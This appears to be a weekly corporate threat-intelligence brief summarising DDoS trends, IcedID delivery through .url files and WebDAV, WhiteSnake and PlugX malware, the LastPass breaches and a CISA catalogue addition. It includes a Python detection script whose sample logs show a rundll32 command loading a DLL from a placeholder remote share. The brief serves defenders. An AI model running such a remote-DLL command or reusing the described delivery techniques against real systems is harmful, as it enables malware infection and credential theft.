Cyber Intel Brief: Feb 23 – Mar 01, 2023

Threat Landscape

DDoS Attacks Surge in 2022, Unlikely to Sustain in 2023

Impacted Industries: All

What You Need To Know:

A recent report by the Financial Services Information Sharing and Analysis Center (FS-ISAC) and Akamai reveals a rise in distributed denial of service (DDoS) attacks affecting the financial services sector, up 22% from the previous year. Some attacks are politically motivated and target government websites, private networks, education facilities, and other critical infrastructure entities that have taken sides in geopolitical tensions: between Russia and Ukraine, between China and Taiwan, and among the US, Israel, and Iran. Hacktivists have been the primary perpetrators, but recent trends show an increase in DDoS extortion attacks for financial gain. The report also identifies the rise of DDoS-as-a-Service, where cybercriminals either launch large-scale attacks on behalf of others or give the paying cybercriminal access to a panel with DDoS capabilities. While the number of DDoS attacks is unlikely to continue at 2022 levels, they remain a significant threat to the financial sector and other critical infrastructure entities.


New Techniques

New Distribution Method Uses .url File Type and WebDAV to Deliver IcedID

Impacted Industries: All

What You Need To Know:

A recent SANS InfoSec Handler’s Diary entry discloses a new distribution method for IcedID malware that uses .url files and WebDAV traffic. The .url file references a URL; when a user clicks it, it launches a website and an associated .bat file, which runs the IcedID installer through RUNDLL32.exe. The WebDAV activity generates HTTP PROPFIND and GET requests. Post-infection traffic is similar to previous IcedID infections, but a GET request to a domain referenced in the .bat file returns a 64-bit DLL that appears to be a decoy. The .url and .bat files share the same file name, likely to avoid detection, and phishing emails with a purchase-order theme may be used to deliver them. Using .url files for malware distribution is a new development, and monitoring will continue.
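The two observables the diary entry gives a defender (WebDAV PROPFIND traffic followed by a GET for the .bat and the decoy DLL, and RUNDLL32.exe launched out of a .bat) can be turned into simple correlation logic. The following is an added example written for this brief, not code from SANS or from Deepwatch; the proxy log format, the Sysmon-style process fields, the host names (`example-webdav.invalid`), file names and IP addresses are all constructed for illustration.

```python
"""Flag the WebDAV .url/.bat delivery chain described in the IcedID write-up.

Signal 1 (proxy/web logs): a client issues WebDAV PROPFIND requests and then
GETs a .bat or .dll from the same host within a short window.
Signal 2 (process-creation logs): rundll32.exe is started by cmd.exe while
cmd.exe is executing a .bat file.
All sample log data below is constructed for this example.
"""
import re
from datetime import datetime, timedelta

# Constructed proxy log lines: "<timestamp> <client_ip> <method> <url> <status>"
PROXY_LOGS = """\
2023-02-27T10:01:02Z 10.0.0.5 PROPFIND http://example-webdav.invalid/share/ 207
2023-02-27T10:01:03Z 10.0.0.5 PROPFIND http://example-webdav.invalid/share/invoice/ 207
2023-02-27T10:01:05Z 10.0.0.5 GET http://example-webdav.invalid/share/invoice/PO-2023.bat 200
2023-02-27T10:01:09Z 10.0.0.5 GET http://example-webdav.invalid/share/invoice/PO-2023.dll 200
2023-02-27T10:05:00Z 10.0.0.9 GET http://intranet.example.invalid/index.html 200
2023-02-27T10:06:00Z 10.0.0.9 PROPFIND http://files.example.invalid/docs/ 207
"""

PROXY_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
SUSPICIOUS_EXT = (".bat", ".dll")


def parse_proxy(text):
    """Parse the constructed proxy format into (time, ip, method, url, status) tuples."""
    rows = []
    for line in text.splitlines():
        m = PROXY_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the sweep
        ts, ip, method, url, status = m.groups()
        rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, method, url, int(status)))
    return rows


def webdav_payload_fetches(text, window=timedelta(minutes=5)):
    """Return (client_ip, url) for successful GETs of a .bat/.dll that followed a
    PROPFIND from the same client to the same host within `window`."""
    last_propfind = {}  # (ip, host) -> time of the most recent PROPFIND
    hits = []
    for ts, ip, method, url, status in parse_proxy(text):
        host = url.split("/")[2].lower()
        if method == "PROPFIND":
            last_propfind[(ip, host)] = ts
        elif method == "GET" and url.lower().endswith(SUSPICIOUS_EXT) and status == 200:
            seen = last_propfind.get((ip, host))
            if seen is not None and ts - seen <= window:
                hits.append((ip, url))
    return hits


# Constructed process-creation events (Sysmon-like fields, simplified).
PROCESS_EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": r'cmd /c "\\example-webdav.invalid\share\invoice\PO-2023.bat"',
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe \\example-webdav.invalid\share\invoice\PO-2023.dll,init"},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe",
     "parent_cmdline": "explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]


def bat_spawned_rundll32(events):
    """Return (host, bat_file_name) where rundll32.exe was launched by a cmd.exe
    that is running a .bat file. The analyst can then compare the .bat name with
    any .url file name seen on the host, since the write-up notes they match."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith("rundll32.exe"):
            continue
        if not ev["parent"].lower().endswith("cmd.exe"):
            continue
        bat = re.search(r'([^\\"/ ]+\.bat)', ev["parent_cmdline"], re.I)
        if bat:
            hits.append((ev["host"], bat.group(1)))
    return hits


if __name__ == "__main__":
    print(webdav_payload_fetches(PROXY_LOGS))
    print(bat_spawned_rundll32(PROCESS_EVENTS))
```

PROPFIND alone is normal on networks that use WebDAV shares, which is why the first function only fires when a PROPFIND is followed by a fetch of an executable-type file from the same host; tune `window` and `SUSPICIOUS_EXT` to your environment.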


Malware

New InfoStealer Targets Linux and Windows Machines

Impacted Industries: All

What You Need To Know:

Cyble discovered cybercrime forum posts promoting an information-stealing malware dubbed WhiteSnake Stealer. It is available in versions for both Windows and Linux and can gather a range of sensitive information, including passwords, cookies, credit card numbers, screenshots, and other personal or financial data, which it sends to a Telegram bot. Cyble also found that the malware had been delivered via spam emails with an attachment. The account promoting WhiteSnake Stealer is new and has a low “reputation” score, so many cybercriminals have likely not used this stealer yet. However, very few stealers can target Linux machines, and this capability may make WhiteSnake more attractive and more prevalent as it gathers attention and awareness.


Malware

Windows Debugger Tool Still Used to Sideload PlugX

Impacted Industries: All

What You Need To Know:

Trend Micro published a report describing how a cybercriminal used DLL search order hijacking to sideload PlugX malware with the open-source Windows debugging tool x32dbg. The attack chain in Trend Micro’s report matches activity detailed in a Sophos report published in late 2020. Based on open-source reporting, one possible initial infection vector is phishing emails with attached .iso files (uncompressed archives). The initial DLL sideloading drops another file that starts a second DLL sideloading routine, which ultimately loads a remote command shell that collects host information, sends it to a command-and-control (C2) server, and monitors for C2 commands.


Data Breach

LastPass Data Breaches Caused by Compromise of Employee Home Computer

Impacted Industries: All

What You Need To Know:

LastPass has disclosed details of two recent data breaches that occurred in August and October of last year. LastPass claims that neither incident was caused by product defects or by unauthorized access to or abuse of production systems. In the first incident, the cybercriminal compromised a software engineer’s corporate laptop (the initial compromise method is unknown), gaining access to source code, technical information, and certain LastPass internal system secrets. In the second incident, the cybercriminal targeted the home computer of one of the software development and IT operations (DevOps) engineers, exploiting a vulnerable third-party media software package to implant keylogger malware. This gave them decryption keys, which they used to decrypt credentials stolen in the first incident; with those credentials they accessed and exfiltrated system configuration data, API secrets, third-party integration secrets, and encrypted and unencrypted LastPass customer data. The breach was a well-planned campaign that lasted 79 days.


Threat Actors

Latest Additions to Data Leak Sites

Impacted Industries: All

What You Need To Know:

In the past week, monitored threat groups added 35 victims to their leak sites. Nineteen of those listed are US-based; Brazil, the United Kingdom, and Germany had three victims each. The most affected industries were manufacturing, with nine victims, and professional services, with four. These listings represent victims whom cybercriminals may have successfully attacked but who opted not to negotiate or pay a ransom. However, we cannot confirm the validity of the cybercriminals’ claims.


Exploited Vulnerabilities

CISA Adds One CVE to its Known Exploited Vulnerabilities Catalog

Impacted Industries: All

What You Need To Know:

Based on evidence of active exploitation, CISA has added CVE-2022-36537 to its Known Exploited Vulnerabilities Catalog. The vulnerability affects ZK Framework’s AuUploader product and allows cybercriminals to retrieve the content of a file located in the web context. Multiple sources routinely report exploitation of public-facing applications as one of the top initial infection vectors.


What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not occur. Terms like “might” reflect situations where we are unable to assess the likelihood, usually because relevant information is lacking, sketchy, or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.


Subscribe to the Deepwatch Insights Blog